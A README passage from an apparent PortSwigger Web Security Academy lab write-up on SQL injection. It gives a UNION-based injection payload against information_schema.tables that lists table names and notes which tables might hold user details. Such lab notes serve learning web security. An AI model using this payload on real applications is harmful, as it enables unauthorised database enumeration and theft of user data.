HarshilBhuva/portswigger-websecurity-academy/01-sqli/SQL_injection_attack,_listing_the_database_contents_on_non-Oracle_databases/README.md

 I use an invalid category so that no articles are found and only my output appears.

+// This reveals all database tables and their schemas (just the names).
+Further details need to be extracted with the next injection.
+Note down potential table schemas that might contain user details.

 ```sql
 SELECT * FROM someTable WHERE category='X' UNION SELECT table_name, null from information_schema.tables--'`
 ```